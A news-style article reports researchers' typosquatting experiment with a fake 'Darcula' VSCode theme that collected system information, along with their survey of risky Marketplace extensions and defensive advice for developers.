Visual Studio Code (VSCode), a highly popular source code editor developed by Microsoft, is a staple in the professional software development community. Central to its widespread appeal is the Visual Studio Code Marketplace, which offers a plethora of extensions that enhance its functionality. However, recent research by a team of Israeli cybersecurity experts has exposed significant vulnerabilities within this marketplace, highlighting a potential security crisis.

 

The Experiment: Typosquatting the Dracula Theme

The Setup

Researchers set out to explore the security landscape of the VSCode Marketplace. They chose a highly popular extension, the ‘Dracula Official’ theme, which boasts over 7 million installs, as their target. By creating a lookalike extension named ‘Darcula’ and registering a domain at ‘darculatheme.com,’ they managed to pose as a verified publisher on the marketplace.

Figure 1 The Darcula extension on the VSCode Marketplace

The Findings

The fake ‘Darcula’ extension included the legitimate code from the original Dracula theme but also added a script that collected sensitive system information, such as hostname, installed extensions, device domain name, and operating system platform. This data was sent to a remote server via HTTPS POST requests.

Astonishingly, the malicious code was not detected by endpoint detection and response (EDR) tools, as VSCode is often given leniency due to its role as a development environment. Consequently, the fake extension was installed by over 100 high-value targets, including major corporations and a national justice court network.

Figure 2 Risky code added to the Darcula extension

VSCode Marketplace: A Breeding Ground for Malicious Extensions

Following their successful experiment, the researchers delved deeper into the VSCode Marketplace, using a custom tool called ‘ExtensionTotal’ to identify high-risk extensions. The results were alarming:

• 1,283 extensions with known malicious code, totalling 229 million installs.
• 8,161 extensions communicating with hardcoded IP addresses.
• 1,452 extensions running unknown executables.
• 2,304 extensions using another publisher’s GitHub repository, indicating potential copycats.

These findings underscore the significant security gaps in the marketplace, where Microsoft’s lack of stringent controls and code review mechanisms has allowed for rampant abuse.

The Impact and Response

The researchers responsibly reported all detected malicious extensions to Microsoft for removal. Despite this, the vast majority of these extensions remain available for download. This situation highlights the urgent need for improved security measures in the VSCode Marketplace.

Security Measures

While this incident raises concerns, there are steps developers can take to fortify their development environment:

• Strict Scrutiny: Don’t be swayed by popularity alone. Research the developer, reviews, and requested permissions before installing any extension.
• Least Privilege: Grant extensions only the minimum permissions necessary for their function. If a seemingly innocuous extension requests extensive access, avoid it.
• Sandboxing: Consider using a sandboxed environment for testing untrusted extensions before deploying them in your primary development environment.
• Security Tools: Leverage code analysis tools to identify suspicious code within extensions before installation.

The Future of VSCode Marketplace Security

The research team plans to release their ‘ExtensionTotal’ tool next week, providing developers with a free resource to scan their environments for potential threats. This proactive step aims to help the developer community safeguard against the risks posed by malicious extensions.

Conclusion

The Visual Studio Code Marketplace’s vulnerabilities present a clear and present danger to organizations worldwide. The ease with which the researchers were able to infiltrate high-value targets through a simple typosquatting attack on a popular theme extension highlights the urgent need for enhanced security measures. Developers and organizations must remain vigilant and utilize tools like ‘ExtensionTotal’ to protect their environments from these hidden threats. As the VSCode Marketplace continues to grow, addressing these security issues must become a priority for Microsoft and the broader cybersecurity community.